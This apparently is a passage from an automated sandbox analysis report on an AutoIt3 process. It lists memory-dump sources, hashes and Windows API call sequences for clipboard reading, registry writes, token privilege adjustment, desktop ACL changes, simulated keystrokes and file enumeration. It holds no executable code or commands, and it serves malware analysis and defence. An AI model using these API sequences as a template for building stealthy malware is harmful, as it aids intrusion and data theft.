                                      • Sleep.KERNEL32(00000002,03CF8045,00000000,03CF8060), ref: 03CF762D
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Sleep
                                      • String ID:
                                      • API String ID: 3472027048-0
                                      • Opcode ID: 3b4e6e461124632eeb1bfab29f759c6da9b0b58dd42315f79016377e4217db15
                                      • Instruction ID: aac0ac342d1ba05c2b4f1d20d0cb9105a450af1e6225b7af0f1a54ff7b049fa8
                                      • Opcode Fuzzy Hash: 3b4e6e461124632eeb1bfab29f759c6da9b0b58dd42315f79016377e4217db15
                                      • Instruction Fuzzy Hash:
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1741961052.00000000011DD000.00000040.00000020.00020000.00000000.sdmp, Offset: 011DD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_11dd000_Autoit3.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: daf07dfe0449386a21cd617d80c280d79caee84e403b1fdd0f7a77803a7c3103
                                      • Instruction ID: bd8b5c5e94d72ecb7e9df4d6f0192b8d58d92d0dea19ae7ad9d6b0e1fdc103bd
                                      • Opcode Fuzzy Hash: daf07dfe0449386a21cd617d80c280d79caee84e403b1fdd0f7a77803a7c3103
                                      • Instruction Fuzzy Hash: 8E31D721504623AAEF2D4A6CCC42BA7BB58FF42328F140325E55797582D730A75BC7B3
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1741961052.00000000011CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 011CD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_11cd000_Autoit3.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 16b0cc3bcb8efeb96049929d558b67534c5615ae68d88d7ee03b1c497bca4c1a
                                      • Instruction ID: dc0a042cee0c4f21f23c744b44ac10563649e949d27198a8f66d5a114d2d01df
                                      • Opcode Fuzzy Hash: 16b0cc3bcb8efeb96049929d558b67534c5615ae68d88d7ee03b1c497bca4c1a
                                      • Instruction Fuzzy Hash: B0012832A08608DFD728CF5DD8C095AFBF9FB45320B5681BAE528D3690D731AC50CA50
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1741961052.00000000011CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 011CD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_11cd000_Autoit3.jbxd
                                      Similarity
                                      • API ID: File$CloseCreateHandleReadSize
                                      • String ID:
                                      • API String ID: 3919263394-0
                                      • Opcode ID: 26a5afddb47bbaaf6a7ee82dbb94c88b565efd795d1168443424a1c7cecc16fe
                                      • Instruction ID: b34ba96737156c7d27970e3d40cddc9b2a83f2110f694b8751efd674a6652cb0
                                      • Opcode Fuzzy Hash: 26a5afddb47bbaaf6a7ee82dbb94c88b565efd795d1168443424a1c7cecc16fe
                                      • Instruction Fuzzy Hash: 7AF05430A04248EFDB09DFA9DC9199DF7B8EB48314F9085B4E814E3690EB755F10DA50
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1741961052.00000000011CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 011CD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_11cd000_Autoit3.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d2b3ba18dd8ecedbb045a92215fd6446520881362c05d2e362cce49d0ebf1c84
                                      • Instruction ID: c4ba340c3833c1939aad385c5b5b21c9cd93f93ea6126160f73c0e10b4afc426
                                      • Opcode Fuzzy Hash: d2b3ba18dd8ecedbb045a92215fd6446520881362c05d2e362cce49d0ebf1c84
                                      • Instruction Fuzzy Hash: 87E042B490BA998ED76CDFA5E50460A7AE2F76870CB52817AC42887208E3788095CF01
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1741961052.00000000011CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 011CD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_11cd000_Autoit3.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9831eed8d6eda24d68a497421f123d12ba3802675b8b2256879e16f8b4b7be92
                                      • Instruction ID: 5dfb65ec4211b1504d7b11591425dfe1f46e7cd184c929c4230eb467ff0a2a64
                                      • Opcode Fuzzy Hash: 9831eed8d6eda24d68a497421f123d12ba3802675b8b2256879e16f8b4b7be92
                                      • Instruction Fuzzy Hash: 539004D5455043114D4555F4CD157C5054CC7DC1D7F150551F134D014CDDCCC1C110F1
                                      APIs
                                        • Part of subcall function 008029E2: GetWindowLongW.USER32(?,000000EB), ref: 008029F3
                                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0088D208
                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0088D249
                                      • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0088D28E
                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0088D2B8
                                      • SendMessageW.USER32 ref: 0088D2E1
                                      • _wcsncpy.LIBCMT ref: 0088D359
                                      • GetKeyState.USER32(00000011), ref: 0088D37A
                                      • GetKeyState.USER32(00000009), ref: 0088D387
                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0088D39D
                                      • GetKeyState.USER32(00000010), ref: 0088D3A7
                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0088D3D0
                                      • SendMessageW.USER32 ref: 0088D3F7
                                      • SendMessageW.USER32(?,00001030,?,0088B9BA), ref: 0088D4FD
                                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0088D513
                                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0088D526
                                      • SetCapture.USER32(?), ref: 0088D52F
                                      • ClientToScreen.USER32(?,?), ref: 0088D594
                                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0088D5A1
                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0088D5BB
                                      • ReleaseCapture.USER32 ref: 0088D5C6
                                      • GetCursorPos.USER32(?), ref: 0088D600
                                      • ScreenToClient.USER32(?,?), ref: 0088D60D
                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 0088D669
                                      • SendMessageW.USER32 ref: 0088D697
                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0088D6D4
                                      • SendMessageW.USER32 ref: 0088D703
                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0088D724
                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0088D733
                                      • GetCursorPos.USER32(?), ref: 0088D753
                                      • ScreenToClient.USER32(?,?), ref: 0088D760
                                      • GetParent.USER32(?), ref: 0088D780
                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 0088D7E9
                                      • SendMessageW.USER32 ref: 0088D81A
                                      • ClientToScreen.USER32(?,?), ref: 0088D878
                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0088D8A8
                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0088D8D2
                                      • SendMessageW.USER32 ref: 0088D8F5
                                      • ClientToScreen.USER32(?,?), ref: 0088D947
                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0088D97B
                                        • Part of subcall function 008029AB: GetWindowLongW.USER32(?,000000EB), ref: 008029BC
                                      • GetWindowLongW.USER32(?,000000F0), ref: 0088DA17
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                      • String ID: @GUI_DRAGID$F
                                      • API String ID: 3977979337-4164748364
                                      • Opcode ID: 8d9ca990f6192b494e0726eaeb624b8b19c650c6b880b687d0ac05e0d9b42166
                                      • Instruction ID: 96681c23d711c606a32690efdac1d04307d486dc5b832b80a994fa352ff758bc
                                      • Opcode Fuzzy Hash: 8d9ca990f6192b494e0726eaeb624b8b19c650c6b880b687d0ac05e0d9b42166
                                      • Instruction Fuzzy Hash: B6426874204341AFD725EF28C848BAABBE5FF88314F140619FA95C72E1DB71A854DF92
                                      APIs
                                      • GetForegroundWindow.USER32(00000000,?), ref: 00815EE2
                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 008510D7
                                      • IsIconic.USER32(?), ref: 008510E0
                                      • ShowWindow.USER32(?,00000009), ref: 008510ED
                                      • SetForegroundWindow.USER32(?), ref: 008510F7
                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0085110D
                                      • GetCurrentThreadId.KERNEL32 ref: 00851114
                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00851120
                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 00851131
                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 00851139
                                      • AttachThreadInput.USER32(00000000,?,00000001), ref: 00851141
                                      • SetForegroundWindow.USER32(?), ref: 00851144
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00851159
                                      • keybd_event.USER32(00000012,00000000), ref: 00851164
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0085116E
                                      • keybd_event.USER32(00000012,00000000), ref: 00851173
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0085117C
                                      • keybd_event.USER32(00000012,00000000), ref: 00851181
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0085118B
                                      • keybd_event.USER32(00000012,00000000), ref: 00851190
                                      • SetForegroundWindow.USER32(?), ref: 00851193
                                      • AttachThreadInput.USER32(?,?,00000000), ref: 008511BA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                      • String ID: Shell_TrayWnd
                                      • API String ID: 4125248594-2988720461
                                      • Opcode ID: aa13bc406c2bf4bfd8a35e09dc3bd1ed6d2123e66c38f4c66266772acb75c266
                                      • Instruction ID: c342f04662b76e15af1e8d05e3d526280137e92f4f97a0d3fa61226d21bdd516
                                      • Opcode Fuzzy Hash: aa13bc406c2bf4bfd8a35e09dc3bd1ed6d2123e66c38f4c66266772acb75c266
                                      • Instruction Fuzzy Hash: 46316271A8031CBEEF216B619C49F7F3E6CFB44B50F154056FE04EA1D1CAB05950AEA0
                                      APIs
                                        • Part of subcall function 00859399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 008593E3
                                        • Part of subcall function 00859399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00859410
                                        • Part of subcall function 00859399: GetLastError.KERNEL32 ref: 0085941D
                                      • _memset.LIBCMT ref: 00858F71
                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00858FC3
                                      • CloseHandle.KERNEL32(?), ref: 00858FD4
                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00858FEB
                                      • GetProcessWindowStation.USER32 ref: 00859004
                                      • SetProcessWindowStation.USER32(00000000), ref: 0085900E
                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00859028
                                        • Part of subcall function 00858DE9: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00858F27), ref: 00858DFE
                                        • Part of subcall function 00858DE9: CloseHandle.KERNEL32(?,?,00858F27), ref: 00858E10
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                      • String ID: $default$winsta0
                                      • API String ID: 2063423040-1027155976
                                      • Opcode ID: e042a6e2781c48b4411fb83d53c955c9111501ed755066e592592b9be6e8d254
                                      • Instruction ID: 9f50d31ec312a5210092bda402353a6e971ce31d2969cf1a623e89e741eabaa7
                                      • Opcode Fuzzy Hash: e042a6e2781c48b4411fb83d53c955c9111501ed755066e592592b9be6e8d254
                                      • Instruction Fuzzy Hash: 50814671840219FFDF21AFA4CC49AAE7B79FF04306F08411AFD50A6261DB368A189F21
                                      APIs
                                      • OpenClipboard.USER32(00890980), ref: 0087465C
                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 0087466A
                                      • GetClipboardData.USER32(0000000D), ref: 00874672
                                      • CloseClipboard.USER32 ref: 0087467E
                                      • GlobalLock.KERNEL32(00000000), ref: 0087469A
                                      • CloseClipboard.USER32 ref: 008746A4
                                      • GlobalUnlock.KERNEL32(00000000,00000000), ref: 008746B9
                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 008746C6
                                      • GetClipboardData.USER32(00000001), ref: 008746CE
                                      • GlobalLock.KERNEL32(00000000), ref: 008746DB
                                      • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 0087470F
                                      • CloseClipboard.USER32 ref: 0087481F
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                      • String ID:
                                      • API String ID: 3222323430-0
                                      • Opcode ID: b73ed90df45018a79b9ea31db11c79101af34003f54c219adfe7d6dfdf19a92a
                                      • Instruction ID: 8ccc3075f04f7cacda6f171117fe8fcf13835d2cd4982b89efe658a74054b6c5
                                      • Opcode Fuzzy Hash: b73ed90df45018a79b9ea31db11c79101af34003f54c219adfe7d6dfdf19a92a
                                      • Instruction Fuzzy Hash: 4A51BB71244205AFE701FB64DC89F6E77A8FF94B41F04852AF65AD21A1DF30D9048A63
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?), ref: 0086CDD0
                                      • FindClose.KERNEL32(00000000), ref: 0086CE24
                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0086CE49
                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0086CE60
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0086CE87
                                      • __swprintf.LIBCMT ref: 0086CED3
                                      • __swprintf.LIBCMT ref: 0086CF16
                                        • Part of subcall function 00811A36: _memmove.LIBCMT ref: 00811A77
                                      • __swprintf.LIBCMT ref: 0086CF6A
                                        • Part of subcall function 008238C8: __woutput_l.LIBCMT ref: 00823921
                                      • __swprintf.LIBCMT ref: 0086CFB8
                                        • Part of subcall function 008238C8: __flsbuf.LIBCMT ref: 00823943
                                        • Part of subcall function 008238C8: __flsbuf.LIBCMT ref: 0082395B
                                      • __swprintf.LIBCMT ref: 0086D007
                                      • __swprintf.LIBCMT ref: 0086D056
                                      • __swprintf.LIBCMT ref: 0086D0A5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                      • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                      • API String ID: 3953360268-2428617273
                                      • Opcode ID: 51dcb5f20c9f70c0e0436a1191cdc40456f37c51e00d4abf5499bd96c4b510e9
                                      • Instruction ID: 74367aa19593920baceba8568800a8f496ba2d0b02879b24b7ac6c286f356d57
                                      • Opcode Fuzzy Hash: 51dcb5f20c9f70c0e0436a1191cdc40456f37c51e00d4abf5499bd96c4b510e9
                                      • Instruction Fuzzy Hash: 21A13AB1508205ABC754EBA8DC85DAFB7ECFF94704F400919F685C6291EB34EA48CB63
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0086F5F9
                                      • _wcscmp.LIBCMT ref: 0086F60E
                                      • _wcscmp.LIBCMT ref: 0086F625
                                      • GetFileAttributesW.KERNEL32(?), ref: 0086F637
                                      • SetFileAttributesW.KERNEL32(?,?), ref: 0086F651
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0086F669
                                      • FindClose.KERNEL32(00000000), ref: 0086F674
                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 0086F690
                                      • _wcscmp.LIBCMT ref: 0086F6B7
                                      • _wcscmp.LIBCMT ref: 0086F6CE
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0086F6E0
                                      • SetCurrentDirectoryW.KERNEL32(008BB578), ref: 0086F6FE
                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0086F708
                                      • FindClose.KERNEL32(00000000), ref: 0086F715
                                      • FindClose.KERNEL32(00000000), ref: 0086F727
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                      • String ID: *.*
                                      • API String ID: 1803514871-438819550
                                      • Opcode ID: 6f1e3b7b63840f645e48ab10c1eb76f6276ea3b3544348f398fae5daa10c6ff3
                                      • Instruction ID: f888b98cb6b0b041e0319ea50ce3463894bf97419ae083bae6ee6c1aeb19f9bb
                                      • Opcode Fuzzy Hash: 6f1e3b7b63840f645e48ab10c1eb76f6276ea3b3544348f398fae5daa10c6ff3
                                      • Instruction Fuzzy Hash: 4131D0726012196EDF20EFB4EC49AEE77ACFF09321F150166FA15D22A1DB34DA44CE61
                                      APIs
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00880FB3
                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,00890980,00000000,?,00000000,?,?), ref: 00881021
                                      • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00881069
                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 008810F2
                                      • RegCloseKey.ADVAPI32(?), ref: 00881412
                                      • RegCloseKey.ADVAPI32(00000000), ref: 0088141F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Close$ConnectCreateRegistryValue
                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                      • API String ID: 536824911-966354055
                                      • Opcode ID: 15cef68cc18cdacd16dc9876c0d89139a4d0fc3f5ba9aa0b4203bcdfbdb3dda3
                                      • Instruction ID: a4c2312956319cf7e1a0ffd807ac791a067eb63562970ecf3e19f0dd035de43d
                                      • Opcode Fuzzy Hash: 15cef68cc18cdacd16dc9876c0d89139a4d0fc3f5ba9aa0b4203bcdfbdb3dda3
                                      • Instruction Fuzzy Hash: 500249752006119FCB54EF28C845A2AB7E9FF88714F04895DF95ADB3A2CB34EC41CB92
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0086F756
                                      • _wcscmp.LIBCMT ref: 0086F76B
                                      • _wcscmp.LIBCMT ref: 0086F782
                                        • Part of subcall function 00864875: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00864890
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0086F7B1
                                      • FindClose.KERNEL32(00000000), ref: 0086F7BC
                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 0086F7D8
                                      • _wcscmp.LIBCMT ref: 0086F7FF
                                      • _wcscmp.LIBCMT ref: 0086F816
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0086F828
                                      • SetCurrentDirectoryW.KERNEL32(008BB578), ref: 0086F846
                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0086F850
                                      • FindClose.KERNEL32(00000000), ref: 0086F85D
                                      • FindClose.KERNEL32(00000000), ref: 0086F86F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                      • String ID: *.*
                                      • API String ID: 1824444939-438819550
                                      • Opcode ID: d0e51fc5014e63c0d3415e7360a603bf65ed2a27e957d859d8cc26f05038b6b0
                                      • Instruction ID: d19cb74fa141316d79b1ca2c1645a5c03473f5a68326e006b1866b4c710fc51a
                                      • Opcode Fuzzy Hash: d0e51fc5014e63c0d3415e7360a603bf65ed2a27e957d859d8cc26f05038b6b0
                                      • Instruction Fuzzy Hash: E031D5725012196EDF21ABB4EC48ADE776CFF09321F1501B5E914E32A2DB34CA458E60
                                      APIs
                                        • Part of subcall function 00858E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00858E3C
                                        • Part of subcall function 00858E20: GetLastError.KERNEL32(?,00858900,?,?,?), ref: 00858E46
                                        • Part of subcall function 00858E20: GetProcessHeap.KERNEL32(00000008,?,?,00858900,?,?,?), ref: 00858E55
                                        • Part of subcall function 00858E20: HeapAlloc.KERNEL32(00000000,?,00858900,?,?,?), ref: 00858E5C
                                        • Part of subcall function 00858E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00858E73
                                        • Part of subcall function 00858EBD: GetProcessHeap.KERNEL32(00000008,00858916,00000000,00000000,?,00858916,?), ref: 00858EC9
                                        • Part of subcall function 00858EBD: HeapAlloc.KERNEL32(00000000,?,00858916,?), ref: 00858ED0
                                        • Part of subcall function 00858EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00858916,?), ref: 00858EE1
                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00858931
                                      • _memset.LIBCMT ref: 00858946
                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00858965
                                      • GetLengthSid.ADVAPI32(?), ref: 00858976
                                      • GetAce.ADVAPI32(?,00000000,?), ref: 008589B3
                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 008589CF
                                      • GetLengthSid.ADVAPI32(?), ref: 008589EC
                                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 008589FB
                                      • HeapAlloc.KERNEL32(00000000), ref: 00858A02
                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00858A23
                                      • CopySid.ADVAPI32(00000000), ref: 00858A2A
                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00858A5B
                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00858A81
                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00858A95
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                      • String ID:
                                      • API String ID: 3996160137-0
                                      • Opcode ID: 2668cca5cd13263b91c717e1b84f9f00aa9e9f5b6a1a4bb6e8c3735e0a0569a3
                                      • Instruction ID: c27443c5f145232dcc9a8f1f3bb4e3c707d5205f7f2c58086a17cb6723076051
                                      • Opcode Fuzzy Hash: 2668cca5cd13263b91c717e1b84f9f00aa9e9f5b6a1a4bb6e8c3735e0a0569a3
                                      • Instruction Fuzzy Hash: C8613675900219EFDF01EFA5DC45AAEBBB9FF04301F08812BE815E6290DB359A19CF61
                                      APIs
